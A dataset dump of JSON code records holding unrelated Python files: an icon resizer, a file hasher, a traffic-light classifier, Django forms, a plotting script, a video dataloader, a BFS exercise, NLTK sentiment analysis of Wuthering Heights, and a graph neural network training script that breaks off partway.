+{"seq_id":"309308950","text":"#!/usr/bin/python\n# coding=utf-8\n\n\n\"\"\"\nUsage:\n ue4-app-icons-generator.py \n ue4-app-icons-generator.py C:/icon.png C:/Workspace/Pirates/src/Build\n\"\"\"\n\n\nimport re\nimport os\nimport sys\nimport json\nfrom docopt import docopt\nfrom PIL import Image\n\n\nCONFIG_PATH = \"config.json\"\nMATCH_PATTERN = r\"(\\d+)x(\\d+)\"\nIMAGE_RESAMPLE_MODE = Image.LANCZOS\n\n\ndef resize_and_save_icon(icon_file, save_path, size_str):\n size_group = re.match(MATCH_PATTERN, size_str)\n if size_group:\n w = int(size_group[1])\n h = int(size_group[2])\n new_icon = icon_file.resize((w, h), IMAGE_RESAMPLE_MODE)\n new_icon.save(save_path, 'png')\n print(\"[OK] %s %dx%d\" % (save_path, w, h))\n else:\n print(\"[FAILED] %s, size format error.\" % save_path)\n\n\ndef iter_file_list(icon_file, root_path, file_list):\n for filename in file_list:\n value = file_list[filename]\n new_path = os.path.join(root_path, filename)\n if type(value).__name__ == \"dict\":\n if not os.path.exists(new_path):\n os.makedirs(new_path)\n iter_file_list(icon_file, new_path, value)\n elif type(value).__name__ == \"str\":\n resize_and_save_icon(icon_file, new_path, value)\n else:\n print(\"[FAILED] Config parse failed.\")\n sys.exit(1)\n\n\ndef iter_config(icon_file, output_path):\n full_config_path = os.path.join(sys.path[0], CONFIG_PATH)\n with open(full_config_path, 'r') as config_file:\n file_list = json.load(config_file)\n iter_file_list(icon_file, output_path, file_list)\n\n\nif __name__ == \"__main__\":\n arguments = docopt(__doc__)\n icon_path = arguments[\"\"]\n output_path = arguments[\"\"]\n\n print(\"icon path: %s\" % icon_path)\n print(\"output path: %s\" % output_path)\n\n with Image.open(icon_path) as icon_file:\n w, h = icon_file.size\n print('original image size: %sx%s' % (w, h))\n iter_config(icon_file, output_path)\n","sub_path":"ue4-app-icons-generator.py","file_name":"ue4-app-icons-generator.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"93992733","text":"import hashlib\nimport os\nimport math\n\nfrom logger import ProgressLogger\n\n\nclass SingleHash():\n\n def __init__(self, path, readsize):\n self._path = path\n self._readsize = readsize\n file_size = os.path.getsize(path)\n progress = math.ceil(file_size / readsize)\n self._logger = ProgressLogger(progress)\n self._logger.log('Hashing file {} with size {}B.'.format(path, file_size))\n\n def hash_file(self):\n hash = hashlib.sha512()\n with open(self._path, 'rb') as file_handle:\n try:\n byte = file_handle.read(self._readsize)\n while byte != b'':\n hash.update(byte)\n self._logger.progress_tick()\n byte = file_handle.read(self._readsize)\n except Exception as e:\n print('An error occurred while hashing file: {}'.format(str(e)))\n finally:\n file_handle.close()\n return hash.hexdigest()\n","sub_path":"single_thread_hash.py","file_name":"single_thread_hash.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"44101386","text":"from styx_msgs.msg import TrafficLight\nimport tensorflow as tf\nimport numpy as np\n\nclass TLClassifier(object):\n def __init__(self, using_sim):\n # A huge thanks to Alex Lechner https://github.com/alex-lechner/CarND-Capstone\n # and Mathias Koehnke https://github.com/mkoehnke/CarND-Capstone-TrafficLightDetection\n # for their documentation regarding the traffic light detection portion of this project\n # By following their guides I was able to train my model, and implement it here.\n # Even then it was a struggle, but I definitely wouldn't have figured it out without\n # their code and docs to guide me.\n\n # The graph for the sim was trained on different images\n # so we must choose it if we are in the sim\n if using_sim:\n self.graph_path = \"light_classification/model/sim_graph.pb\"\n #Use a stricter threshold for the sim, because our images our very crisp\n self.threshold = .70\n else:\n self.graph_path = \"light_classification/model/real_graph.pb\"\n # The real world is harder, and we so relax the conditions\n # We want to make sure we don't miss a red light\n # In the future, it might be good to have different weights for\n # each type of light.\n self.threshold = .50 \n \n self.graph = tf.Graph()\n \n\n with self.graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(self.graph_path, 'rb') as fid:\n od_graph_def.ParseFromString(fid.read())\n tf.import_graph_def(od_graph_def, name='')\n\n self.image_tensor = self.graph.get_tensor_by_name('image_tensor:0')\n self.boxes = self.graph.get_tensor_by_name('detection_boxes:0')\n self.scores = self.graph.get_tensor_by_name('detection_scores:0')\n self.classes = self.graph.get_tensor_by_name('detection_classes:0')\n self.num_detections = self.graph.get_tensor_by_name(\n 'num_detections:0')\n\n self.sess = tf.Session(graph=self.graph)\n\n\n def get_classification(self, image):\n \"\"\"Determines the color of the traffic light in the image\n\n Args:\n image (cv::Mat): image containing the traffic light\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n with self.graph.as_default():\n img_expand = np.expand_dims(image, axis=0)\n boxes, scores, classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={self.image_tensor: img_expand})\n\n boxes = np.squeeze(boxes)\n scores = np.squeeze(scores)\n classes = np.squeeze(classes).astype(np.int32) # needs to be an inte\n\n # Make an empty list to count all of the different guesses\n max_hits = [0]*4\n for score in scores:\n if score > self.threshold:\n max_hits[classes[0]] += 1\n # Take the Traffic Light state with the most guesses\n # get most hit class4\n max_index = max_hits.index(max(max_hits))\n # This is the estimate that we will return\n if max_index == 1:\n print('RED')\n return TrafficLight.RED\n elif max_index == 2:\n print('YELLOW')\n return TrafficLight.YELLOW\n elif max_index == 3:\n print('GREEN')\n return TrafficLight.GREEN\n return TrafficLight.UNKNOWN","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"461763626","text":"\n# -*- coding:utf-8 -*-\n\n# Core Django imports\nfrom django import forms\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.forms.models import inlineformset_factory\n\n# Realative imports of the 'app-name' package\nfrom .models import SpeakerUser, KindContact\n\n\nclass SpeakerUserCreationForm(UserCreationForm):\n class Meta:\n model = SpeakerUser\n fields = ('username',)\n\n def clean_username(self):\n # Since User.username is unique, this check is redundant,\n # but it sets a nicer error message than the ORM. See #13147.\n username = self.cleaned_data[\"username\"]\n try:\n SpeakerUser._default_manager.get(username=username)\n except SpeakerUser.DoesNotExist:\n return username\n raise forms.ValidationError(self.error_messages['duplicate_username'])\n\n\nclass SpeakerUserChangeForm(UserChangeForm):\n class Meta:\n model = SpeakerUser\n fields = '__all__'\n\n\nclass SpeakerBasicInformationForm(forms.ModelForm):\n u\"\"\"\n Classe para o formulário de edição básica das\n informações do palestrante\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(SpeakerBasicInformationForm, self).__init__(*args, **kwargs)\n self.fields['first_name'].required = True\n self.fields['last_name'].required = True\n\n class Meta:\n u\"\"\"\n Define atributos do formulario\n \"\"\"\n\n model = SpeakerUser\n u\"\"\"\n Define qual Model será utilizado\n \"\"\"\n\n fields = ('id', 'first_name', 'last_name', 'bio',)\n u\"\"\"\n Atributos que irão aparecer no formulário\n \"\"\"\n\n help_texts = {\n 'first_name': _(\n u'Exemplo: Jhon'\n ),\n 'last_name': _(\n u'Exemplo: Doe'\n ),\n 'bio': _(\n u'Jhon Doe é programador django/python'\n ),\n }\n\n widgets = {\n 'first_name': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Insira o primeiro nome'),\n }\n ),\n 'last_name': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Insira o último nome'),\n }\n ),\n 'bio': forms.Textarea(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Insira um breve texto aqui'),\n }\n ),\n }\n\n error_messages = {\n 'first_name': {\n 'required': _(u'O primeiro nome é obrigatório')\n },\n 'last_name': {\n 'required': _(u'O último nome é obrigatório')\n },\n\n }\n\n\nclass SpeakerContactForm(forms.ModelForm):\n u\"\"\"\n Classe para o formulário de edição básica das\n informações do palestrante\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(SpeakerContactForm, self).__init__(*args, **kwargs)\n\n class Meta:\n u\"\"\"\n Define atributos do formulario\n \"\"\"\n\n model = KindContact\n u\"\"\"\n Define qual Model será utilizado\n \"\"\"\n\n fields = ('kind', 'value',)\n u\"\"\"\n Atributos que irão aparecer no formulário\n \"\"\"\n\n help_texts = {\n 'kind': _(\n u'Escolha um tipo de contato dentre as opções acima'\n ),\n 'value': _(\n u'Informe os dados da respectiva opção'\n ),\n }\n\n widgets = {\n\n 'kind': forms.Select(\n attrs={\n 'class': 'form-control',\n }\n ),\n 'value': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Informe um valor aqui'),\n }\n ),\n }\n\nContactFormSet = inlineformset_factory(\n SpeakerUser,\n KindContact,\n form=SpeakerContactForm\n)\n","sub_path":"speakers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"634101398","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 14:23:16 2020\n\n@author: henry\n\"\"\"\n\nimport os\n\n# plt.legend()\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom src.plotting.myplotlib import init_figure, Columnes, Journal, save_figure\n\n\ndef plot_cumsum_plot(baseline, scenario1, scenario2, scenario3):\n journal = Journal.POWERPOINT_A3\n\n fig, ax = init_figure(nrows=1,\n ncols=1,\n columnes=Columnes.ONE,\n journal=journal)\n\n lbase = plot_cumsum_by_scenario(baseline[baseline.is_home], ax, label='Baseline')\n l1 = plot_cumsum_by_scenario(scenario1[scenario1.is_home], ax, label='Scenario 1')\n l2 = plot_cumsum_by_scenario(scenario2, ax, label='Scenario 2')\n l3 = plot_cumsum_by_scenario(scenario3, ax, label='Scenario 3')\n\n xlim = plt.xlim()\n lxy = plt.plot(np.arange(0, xlim[1]), np.arange(0, xlim[1]), label='x=y (only using pv generation)', color='k',\n linestyle=':', linewidth=2)\n lyx = plt.plot(np.arange(0, xlim[1]), - np.arange(0, xlim[1]), label='x=-y (only using grid generation)', color='k',\n linestyle=':', linewidth=2)\n\n lyx = plt.plot(np.arange(0, xlim[1]), 0 * np.arange(0, xlim[1]), label=None, color='k',\n linestyle='--', linewidth=2)\n xlim = plt.xlim()\n\n ylim = plt.ylim()\n ylim = (ylim[0], xlim[1])\n print(ylim)\n ax.set_ylim(ylim)\n ax.set_xlim((0, xlim[1]))\n plt.xlabel('Total energy used by cars (cumulative) [MWh]', labelpad=15)\n plt.ylabel('PV charging - grid charging \\n (cumulative) [MWh]', labelpad=15)\n leg = plt.legend(ncol=3, loc='upper left', bbox_to_anchor=(-0.15, -0.2), borderpad=0., frameon=False)\n plt.tight_layout()\n bbox_extra_artists = [fig, leg, ax]\n save_figure(os.path.join('plots', 'cumulative_energy_plot', 'cumsum_all_scenarios.png'),\n bbox_extra_artists=bbox_extra_artists)\n\n\ndef plot_cumsum_by_scenario(data_raw, ax, label=None):\n data = data_raw.copy()\n\n cumsum_saldo = (data['charged_from_pv'] - data['charged_from_outside']).cumsum() / 1000\n cumsum_total_consumption = data['needed_by_car'].cumsum() / 1000\n\n handle = ax.plot(cumsum_total_consumption, cumsum_saldo, label=label, linewidth=2)\n return handle[0]\n\n\ndef parse_dates(data_raw):\n data = data_raw.copy()\n data['start'] = pd.to_datetime(data['start'])\n data['end'] = pd.to_datetime(data['end'])\n\n return data\n\n\nif __name__ == '__main__':\n output_folder = os.path.join('.', 'data', 'output', 'PVMODEL_SPV170')\n\n baseline = pd.read_csv(os.path.join(output_folder, 'results_baseline.csv'))\n baseline = parse_dates(baseline).sort_values('start')\n\n scenario1 = pd.read_csv(os.path.join(output_folder, 'results_scenario1.csv'))\n scenario1 = parse_dates(scenario1).sort_values('start')\n\n scenario2 = pd.read_csv(os.path.join(output_folder, 'results_scenario2.csv'))\n scenario2 = parse_dates(scenario2).sort_values('start')\n\n scenario3 = pd.read_csv(os.path.join(output_folder, 'results_scenario3.csv'))\n scenario3 = parse_dates(scenario3).sort_values('start')\n\n plot_cumsum_plot(baseline, scenario1, scenario2, scenario3)\n","sub_path":"src/plotting/plot_cumsum_charging_strategies.py","file_name":"plot_cumsum_charging_strategies.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"445643612","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.utils.data\r\nfrom torch import nn, optim\r\nfrom torch.nn import functional as F\r\nimport os\r\nimport pandas as pd \r\nfrom skimage import io, transform\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torch.autograd import Variable\r\nfrom typing import Tuple\r\nimport skvideo.io\r\nfrom skimage import io, transform\r\n\r\n''' \r\nfor seq2seq model training\r\n'''\r\n\r\n\r\ndef sample_interval(length, points):\r\n interval = float(length)/float(points)\r\n indexes = []\r\n for i in range(points):\r\n index = int(interval*(i+1) - 1)\r\n indexes.append(index)\r\n return indexes\r\n\r\n\r\n# get only a portion of the whole videos \r\nclass splitLongVdDataset(Dataset):\r\n def __init__(self, data_dir, label_dir):\r\n self.data_dir = data_dir\r\n self.label_dir = label_dir\r\n self.videos = os.listdir(data_dir)\r\n self.H_re = 299\r\n self.W_re = 299\r\n #assert len(self.video_list) == self.len_data\r\n \r\n def __len__(self):\r\n return len(self.videos)\r\n \r\n def getVideoLen(self, idx):\r\n video_dir = os.path.join(self.data_dir, self.videos[idx])\r\n # video data in the form of multiple images\r\n video_files = os.listdir(video_dir) # multiple .jpg files\r\n return len(video_files)\r\n \r\n def getVideoFrames(self, idx, frame_idx):\r\n '''\r\n idx: video index\r\n frame_idx: frame index (list)\r\n '''\r\n video_dir = os.path.join(self.data_dir, self.videos[idx])\r\n \r\n # video data in the form of multiple images\r\n video_files = os.listdir(video_dir) # multiple .jpg files\r\n video_files.sort()\r\n img_stk = []\r\n img_collection = io.imread_collection([os.path.join(video_dir, video_files[i_img]) for i_img in frame_idx])\r\n \r\n for i_img in range(len(img_collection)):\r\n #img = io.imread(os.path.join(video_dir, video_files[i_img]))\r\n img = img_collection[i_img]\r\n img = transform.resize(img, [self.H_re, self.W_re, 3])\r\n img = img.astype(np.float32)\r\n img = img/255\r\n img_stk.append(img)\r\n #print(i_img)\r\n img_stk = np.stack(img_stk)\r\n #print(' image stack shape', img_stk.shape)\r\n \r\n # video label\r\n label_file = open(os.path.join(self.label_dir, self.videos[idx]) + '.txt', 'r')\r\n label_data = label_file.readlines()\r\n label_data = np.array(label_data, dtype=np.int)\r\n label_data = label_data[frame_idx]\r\n label_file.close()\r\n \r\n assert label_data.shape[0] == img_stk.shape[0]\r\n \r\n # convert to pytorch format\r\n img_stk = img_stk.transpose((0, 3, 1, 2))\r\n img_stk = torch.Tensor(img_stk)\r\n label_data = torch.LongTensor(label_data)\r\n \r\n return {'X': img_stk, 'Y': label_data}\r\n \r\n def __getitem__(self, idx):\r\n video_dir = os.path.join(self.data_dir, self.videos[idx])\r\n \r\n # video data in the form of multiple images\r\n video_files = os.listdir(video_dir) # multiple .jpg files\r\n video_files.sort()\r\n img_stk = []\r\n \r\n img_collection = io.imread_collection([os.path.join(video_dir, video_files[i_img]) for i_img in range(len(video_files))])\r\n for i_img in range(len(video_files)):\r\n img = img_collection[i_img]\r\n img = transform.resize(img, [self.H_re, self.W_re, 3])\r\n img = img.astype(np.float32)\r\n img = img/255\r\n img_stk.append(img_stk)\r\n print(i_img)\r\n img_stk = np.stack(img_stk)\r\n \r\n # video label\r\n print(os.path.join(self.label_dir, self.videos[idx]) + '.txt')\r\n label_file = open(os.path.join(self.label_dir, self.videos[idx]) + '.txt', 'r')\r\n label_data = label_file.readlines()\r\n label_file.close()\r\n label_data = np.array(label_data, dtype=np.int)\r\n print('Read label')\r\n \r\n \r\n assert label_data.shape[0] == img_stk.shape[0]\r\n \r\n # convert to pytorch format\r\n img_stk = img_stk.transpose((0, 3, 1, 2))\r\n img_stk = torch.Tensor(img_stk)\r\n label_data = torch.LongTensor(label_data)\r\n \r\n return {'X': img_stk, 'Y': label_data}\r\n \r\nif __name__ == '__main__':\r\n # data directory\r\n data_dir = 'HW5_data/FullLengthVideos/videos/train'\r\n label_dir = 'HW5_data/FullLengthVideos/labels/train'\r\n \r\n dataset = splitLongVdDataset(data_dir=data_dir, label_dir=label_dir)\r\n print('Dataset len:', len(dataset))\r\n \r\n print('video[0] len:', dataset.getVideoLen(0))\r\n frame_idx = list(range(200))\r\n sample = dataset.getVideoFrames(0, frame_idx)\r\n print('image stack shape:', sample['X'].shape)\r\n print('label shape: ', sample['Y'].shape)\r\n \r\n #sample = dataset[0]\r\n #print('image stack shape:', sample['X'].shape)\r\n #print('label shape: ', sample['Y'].shape)\r\n \r\n ","sub_path":"hw5/longVd_dataloader.py","file_name":"longVd_dataloader.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"565025070","text":"import sys\nsys.stdin = open('input.txt','r')\n\nn = int(input())\nnod = {}\ncango = {}\nfor a in range(n):\n nod[a], cango[a] = [] , []\n l = list(map(int,input().split()))\n for e in range(n):\n if l[e] == 1:\n nod[a].append(e)\n# print(nod)\n# print(cango)\n\nfor s in nod:\n # print(s)\n que = [s]\n visit = []\n while que:\n now = que.pop(0)\n # if now not in visit:\n # visit.append(now)\n for t in nod[now]:\n # print('t:',t)\n if t not in que + visit:\n que.append(t)\n visit.append(t)\n # print(que, visit)\n # print(visit,'end')\n for a in visit: cango[s].append(a)\n# print('cango:',cango)\n\nres = [['0']*n for _ in range(n)]\nfor a in range(n):\n for c in cango[a]:\n res[a][c] = '1'\n\nfor a in res: print(' '.join(a))","sub_path":"Problem/BaekJoon/11403.경로찾기(BFS).py","file_name":"11403.경로찾기(BFS).py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"481033974","text":"# Sentiment analysis on the piece of classic literature:\n# Wuthering Heights. For more information on nltk functions\n# and other Natural Language Processing Toolkit Applications\n# please visit https://www.nltk.org/. Happy coding!\n\nimport nltk\nfrom urllib import request\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nnltk.download('punkt')\n\n#pre-processing to grab text\nurl = \"https://www.gutenberg.org/files/768/768.txt\"\nresponse = request.urlopen(url)\nraw = response.read().decode('utf8')\ntokens = nltk.word_tokenize(raw)\ntext = nltk.Text(tokens)\n\n#concordance of the text file - print automatically\ntext.concordance(\"moors\")\n\n#common-contexts of where words appear - print automatically\ntext.common_contexts([\"moors\"])\ntext.common_contexts([\"Cathy\", \"Heathcliff\"])\n\n#word frequency and percentage\ncount_heathcliff = text.count(\"Heathcliff\")\nprint(count_heathcliff)\ntotal_words = len(text)\npercentage_heathcliff = count_heathcliff/total_words\nprint(percentage_heathcliff)\n\n#sentiment analysis\nnltk.download('vader_lexicon')\nsid = SentimentIntensityAnalyzer()\nscores = sid.polarity_scores(raw)\nprint(scores)\n","sub_path":"cs_applications_in_english/wuthering.py","file_name":"wuthering.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"424656018","text":"\n#### Importing all the packages\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n### We import torch functionis \nimport torch\nfrom torchvision import datasets , transforms\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.nn as nn\n\nimport sys\nimport os\nsys.path.append(os.getcwd())\n\n\n#### We import custom functions \nfrom src.cfg.load_yaml import load_yamlcfg\nfrom src .builder import graphdataload\nfrom src. builder .graphdataload import classnames\nfrom src. utils.base_utils import increment_path ,sparse_mx_to_torch_sparse_tensor\nfrom src. models.models import grand\nfrom src. viz.viz_graph import t_SNE,plot_train_val_loss,plot_train_val_acc\nfrom src. viz.viz_graph import pca_tsne,tsne_legend\nfrom src. metrics.metric import classify,accuracy\n\n\n#### We import default functions\nimport time \nimport argparse\nimport numpy as np \nimport glob \nimport os \nimport logging\nimport random\nfrom pathlib import Path\nimport pyfiglet\nimport scipy.sparse as sp\n\n\n\n#### Logging of the data into the txt file \nlogging.getLogger().setLevel(logging.INFO)\n\nglobal device\n\n# https://github.com/wzfhaha/grand_dropedge\n\ndef preprocess(a):\n #d1 = np.array(a.sum(axis-1))**(-0.5)\n #d2 = np.array(a.sum(axis=0))**(-0.5)\n D1_ = np.array(a.sum(axis=1))**(-0.5)\n D2_ = np.array(a.sum(axis=0))**(-0.5)\n D1_ = sp.diags(D1_[:,0], format='csr')\n D2_ = sp.diags(D2_[0,:], format='csr')\n A_ = a.dot(D1_)\n A_ = D2_.dot(A_)\n A_ = sparse_mx_to_torch_sparse_tensor(A_) \n if torch.cuda.is_available():\n A_ = A_.cuda()\n return A_ \n\n\ndef random_edge_sample(edges, droprate,features):\n edges = list(edges)\n n = features.shape[0]\n m = len(edges)\n index = np.random.permutation(m)\n percent = 1. - droprate\n preserve_num = int(m * percent)\n \n index_ = index[:preserve_num]\n sample_row = [edges[x][0] for x in index_]\n sample_col = [edges[x][1] for x in index_]\n sample_adj = sp.csr_matrix((np.ones(preserve_num), (sample_row, sample_col)), shape=(n,n))\n sample_adj = sample_adj + sample_adj.T.multiply(sample_adj.T>sample_adj) - sample_adj.multiply(sample_adj.T>sample_adj) + sp.eye(n)\n sample_adj = preprocess(sample_adj)\n return sample_adj \n\n\n\n\ndef rand_prop(features, A,edges,dropnode_rate,orderr,training):\n n = features.shape[0]\n drop_rate = dropnode_rate\n # drop_rates = torch.FloatTensor(np.ones(n) * drop_rate)\n \n if training:\n a = random_edge_sample(edges,drop_rate,features)\n\n else : \n a = A \n\n features = propagate(features, a, orderr) \n return features\n\ndef consis_loss(logps, temp , lam):\n ps = [torch.exp(p) for p in logps]\n sum_p = 0.\n for p in ps:\n sum_p = sum_p + p\n avg_p = sum_p/len(ps)\n #p2 = torch.exp(logp2)\n \n sharp_p = (torch.pow(avg_p, 1./temp) / torch.sum(torch.pow(avg_p, 1./temp), dim=1, keepdim=True)).detach()\n loss = 0.\n for p in ps:\n loss += torch.mean((p-sharp_p).pow(2).sum(1))\n loss = loss/len(ps)\n return lam * loss\n\ndef propagate(feature, A, order):\n #feature = F.dropout(feature, args.dropout, training=training)\n #x = feature\n y = torch.spmm(A,feature).detach_()\n x = y\n for i in range(order):\n if i ==0:\n x = torch.spmm(A, x).detach_()\n else:\n x = torch.spmm(A, x).detach_()\n #print(y.add_(x))\n y.add_(x)\n #y= x\n return y.div_(order+1.0).detach_()\n\n###### Function to Train the dataset \n\ndef train(model, optimizer, features, adj, labels, idx_train,idx_val,epoch,sample,\\\n dropnode_rate,orderr, temp , lam,edges,valmode):\n\n X = features\n\n model.train()\n optimizer.zero_grad()\n\n X_list = []\n K = sample\n for k in range(K):\n X_list.append(rand_prop(X,adj,edges,dropnode_rate,orderr, training=True))\n\n output_list = []\n for k in range(K):\n output_list.append(torch.log_softmax(model(X_list[k]), dim=-1))\n\n loss_train = 0.\n for k in range(K): \n loss_train += F.nll_loss(output_list[k][idx_train], torch.max(labels[idx_train],1)[1])\n\n loss_train = loss_train/K\n\n loss_consis = consis_loss(output_list, temp , lam)\n \n loss_train = loss_train + loss_consis\n \n acc_train = accuracy(output_list[0][idx_train], torch.max( labels[idx_train],1)[1])\n loss_train.backward()\n optimizer.step()\n\n if not valmode:\n # Evaluate validation set performance separately,\n # deactivates dropout during validation run.\n with torch.no_grad():\n model.eval()\n X = rand_prop(X,adj,edges,dropnode_rate,orderr,training=False)\n output = model(X)\n output = torch.log_softmax(output, dim=-1)\n\n loss_val = F.nll_loss(output[idx_val],torch.max( labels[idx_val],1)[1]) \n acc_val = accuracy(output[idx_val], torch.max( labels[idx_val],1)[1])\n\n\n return loss_train.data.item(), acc_train.data.item() , loss_val.data.item(),acc_val.data.item()\n\n\n\ndef test(model, features, adj, edges,idx_test,labels,outputviz,data_type,dropnode_rate,orderr,fig_path):\n \n model.eval()\n X = features\n X = rand_prop(X,adj,edges,dropnode_rate,orderr, training=False)\n output = model(X)\n output = torch.log_softmax(output, dim=-1)\n\n loss_test = F.nll_loss(output[idx_test],torch.max( labels[idx_test],1)[1])\n acc_test = accuracy(output[idx_test], torch.max( labels[idx_test],1)[1])\n\n \n print(\"Test set results:\", \"loss= {:.4f}\".format(loss_test.item()), \"accuracy= {:.4f}\".format(acc_test.item()))\n logging.info(\"Testing loss: {:.4f} acc: {:.4f} \".format(loss_test.item(),acc_test.item())) #array([0, 1], dtype=int64)\n\n report = classify(output,labels,classnames[data_type]) \n logging.info('GCN Classification Report: \\n {}'.format(report))\n\n if outputviz :\n logging.info(\"\\n[STEP 5]: Visualization {} results.\".format(data_type))\n ## Make a copy for pca and tsneplot \n outs = output\n label=labels\n # Calculate the predicted value\n \n output = output.cpu().detach().numpy()\n labels = labels.cpu().detach().numpy()\n \n ## visualization with normal tsne and pc \n result_tsne = t_SNE(output, labels,2,fig_path)\n pca_tsne(outs,label,fig_path)\n # tsne_legend(outs, label, classnames[data_type], 'test_set',fig_path)\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"GNN Node Classification\")\n\n\n parser.add_argument('--config_path', action='store_true', \\\n default='E:\\\\Freelance_projects\\\\GNN\\\\Tutsv2\\\\pyGNN_NC_XAI_V2\\\\Grand_DropEdge\\\\config\\\\grand_cora.yaml', help='Provide the config path')\n\n #### to create an inc of directory when running test and saving results \n parser.add_argument('--name', default='exp', help='save results to project/name')\n parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')\n\n\n args = parser.parse_args()\n\n\n ###### Params loading from config File \n\n config_path = args.config_path\n configs = load_yamlcfg(config_file= config_path)\n\n data_type = configs['Data']['datatype']\n data_saveresult= configs['Data']['save_results']\n train_datapath = configs['Data']['datapath']\n train_seedvalue = configs['random_state']\n model_type = 'grand_dropedge'\n train_modelsave = configs['Data']['model_save_path']\n train_savefig = configs['Data']['save_fig']\n test_outputviz = configs['Data']['output_viz']\n\n #--------------------------------------------------------------#\n dropout= configs['Model']['dropout']\n ipdim= configs['Model']['input_dim']\n opdim= configs['Model']['output_dim']\n hiddim= configs['Model']['hidden_dim']\n ip_droprate = configs['Model']['dropout']\n hid_droprate = configs['Model']['dropout']\n use_bn = configs['Model']['use_bn']\n #--------------------------------------------------------------#\n train_lr = configs['Hyper']['LR']\n train_wtdecay = configs['Hyper']['weight_decay']\n train_epochs = configs['Hyper']['epochs']\n train_valmode = False\n train_patience=configs['Hyper']['Patience']\n\n\n #--------------------------------------------------------------#\n sample = configs['grand']['S']\n dropnode_rate= configs['grand']['D']\n orderr= configs['grand']['K']\n temp = configs['grand']['T']\n lam= configs['grand']['L']\n\n\n \n ### Creating an incremental Directories \n save_dir = Path(increment_path(Path(data_saveresult) / 'exp', exist_ok=args.exist_ok)) # increment run\n \n #### Creating and saving into the log file\n logsave_dir= \"./\" \n logging.basicConfig(level=logging.INFO,\n handlers=[logging.FileHandler(os.path.join(logsave_dir+model_type + '_log.txt')),\n logging.StreamHandler() ], \n format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p' \n )\n\n ####Bannering\n ascii_banner = pyfiglet.figlet_format(\"GRAND DropEdge !\")\n print(ascii_banner)\n logging.info(ascii_banner)\n \n ###### To check if cuda is available else use the cpu \n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n logging.info(f'Using: {device}')\n logging.info(\"Using seed {}.\".format(train_seedvalue))\n \n\n #### Initialize the manual seed from argument \n np.random.seed(train_seedvalue)\n torch.manual_seed(train_seedvalue)\n if device.type == 'cuda' :\n torch.cuda.manual_seed(train_seedvalue)\n\n ###### Data loading based on the dataset \n \n if data_type == 'cora' or data_type == 'citeseer' or data_type == 'pubmed':\n \n citedata = graphdataload.Graph_data(train_datapath,data_type,'SemiSupervised')\n citedata.load_data()\n\n adj = getattr(citedata, data_type+'_adjlist')\n features = getattr(citedata, data_type+'_features')\n labels = getattr(citedata, data_type+'_labels')\n idx_train = getattr(citedata, data_type+'_train_idx')\n idx_val = getattr(citedata, data_type+'_val_idx')\n idx_test = getattr(citedata, data_type+'_test_idx')\n edges = getattr(citedata, data_type+ '_edges')\n idx_unlabel = torch.range(idx_train.shape[0], labels.shape[0]-1, dtype=int)\n\n logging.info(\"\\n[STEP 1]: Processing {} dataset.\".format(data_type))\n logging.info(\"| # of nodes : {}\".format(adj.shape[0])) \n logging.info(\"| # of features : {}\".format(features.shape[1]))\n logging.info(\"| # of clases : {}\".format(labels.shape[1]))\n logging.info(\"| # of train set : {}\".format(len(idx_train)))\n logging.info(\"| # of val set : {}\".format(len(idx_val)))\n logging.info(\"| # of test set : {}\".format(len(idx_test)))\n logging.info(\"| # of unlabeled set : {}\".format(len(idx_unlabel)))\n\n else:\n raise NotImplementedError(data_type)\n\n logging.info(\"Dataset Used {}.\".format(data_type))\n\n\n #######Data Loading is completed \n\n ###Intialization of variables\n nclass = labels.shape[1]\n num_feats = features.shape[1]\n\n # Model and optimizer\n logging.info(\"\\n[STEP 2]: Model {} definition.\".format(model_type))\n\n model = grand(nfeat=num_feats,\n nhid=hiddim,\n nclass=nclass,\n input_droprate=ip_droprate,\n hidden_droprate=hid_droprate,\n use_bn = use_bn)\n\n # optimizer \n optimizer = optim.Adam(model.parameters(),lr=train_lr, 